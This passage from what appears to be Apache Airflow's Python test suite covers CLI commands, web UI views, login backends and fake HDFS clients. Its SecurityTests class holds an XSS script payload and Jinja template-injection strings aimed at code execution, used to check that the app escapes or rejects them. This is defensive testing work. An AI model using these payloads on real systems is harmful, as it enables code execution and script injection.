new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
            except Exception:
                # the pid file may not have been written yet; retry until it appears
                sleep(1)
def test_cli_webserver_foreground(self):
        # Confirm that the webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
        # Confirm that the webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
    # Patch get_num_workers_running to return 0 so that the webserver times out waiting for workers.
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
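# Security-focused web UI tests: CSRF rejection/acceptance, XSS escaping in the
# log view, and rejection of malicious Jinja templates in chart definitions.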
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
        except Exception:
            # an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
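# Smoke tests for the main admin UI views (graph, tree, duration, gantt, logs,
# task/dag stats and the success/clear/run actions) using the example DAGs.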
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
        # The HTML should contain data for the last run: a link to the specific
        # run and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
        }).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
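# With core.secure_mode enabled, the ad-hoc query view and the chart view must
# not be exposed (both should return 404).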
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
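# Login/logout flow for the password_auth backend; a test user is created in
# setUp and all users are removed again in tearDown.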
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            # the ldap section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
            # the ldap section may already exist
            pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
